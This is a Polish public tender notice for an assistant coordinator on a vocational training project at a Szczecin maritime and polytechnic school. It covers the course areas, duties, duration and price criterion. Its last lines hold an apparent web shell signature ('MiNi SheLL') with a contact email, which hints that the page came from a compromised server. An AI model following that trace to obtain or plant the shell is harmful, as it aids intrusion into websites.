<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje: Pełnienie funkcji Asystenta Koordynatora ds. administracyjnych, rekrutacji, ewaluacji i monitoringu oraz nadzoru nad realizacją staży projektu przez okres 21 miesięcy, w ilości 160 godzin/miesiąc w ramach projektu pn.: Najlepszy w zawodzie, którego zakres merytoryczny obejmuje szkolenia, staże u pracodawców oraz doradztwo zawodowe skierowane do uczniów Zachodniopomorskiego Centrum Edukacji Morskiej i Politechnicznej w Szczecinie z zakresu:

a)	Realizacji zajęć z programowania i obsługi obrabiarek sterowanych numerycznie CNC (Computerized Numerical Control - pol.: komputerowe sterowanie urządzeń numerycznych) - zajęcia dedykowane dla uczniów kształcących się w zakresie zawodów technik mechanik i mechatronik,
b)	Realizacji zajęć z zakresu techniki szybkiej i efektywnej nauki, warsztatu edukacji finansowej Cashflow, kursu fakturowania, rozwiązywania zadań w ramach wirtualnego laboratorium logistyczno - spedycyjnego i magazynowego oraz kursu operatora wózków podnośnikowych na uprawnienia Urzędu Dozoru Technicznego - zajęcia dedykowane uczniom kształcącym się w zakresie zawodu technik logistyk,
c)	Realizacji zajęć pozalekcyjnych z wykorzystaniem Symulatora ECDIS w wersji na 8 stanowisk ćwiczeniowych, umożliwiający przeprowadzenie zajęć z nawigacji, astronawigacji, nawigacji technicznej, manewrowania statkiem, ratownictwa morskiego (zajęcia stanowić będą podstawę do uzyskania certyfikatów operatorów systemów ECDIS oraz RADAR/ARPA) a także zagadnienia dotyczące portowego obrotu towarowego oraz aspekty podstawowego kursu dla operatorów portowych (obliczenie ilości ładunku metodą DRAFT SURVEY) - zajęcia dedykowane uczniom kształcącym się w zakresie zawodu technik nawigator,
d)	Realizacji zajęć z zawodowego języka obcego,
e)	Realizacji stażów u pracodawców oraz
f)	Realizacji doradztwa zawodowego i edukacyjnego

Obowiązki wykonawcy:
a)	Prowadzenie wszelkich działań administracyjnych w ramach projektu,
b)	Prowadzenie rekrutacji,
c)	Realizacja działań promocyjnych,
d)	Stały merytoryczny nadzór nad realizacją i postępem rzeczowym poszczególnych zadań dydaktycznymi w projekcie,
e)	Zaprojektowanie oraz przygotowanie ankiet ewaluacyjnych dla potrzeb ewaluacji,
f)	Prowadzenie wewnętrznych działań ewaluacyjnych w ramach projektu,
g)	Organizacja oraz nadzór nad realizacją staży w przedsiębiorstwach oraz instytucjach otoczenia rynku pracy,
h)	Prowadzenie dokumentacji PEFS.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.40.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com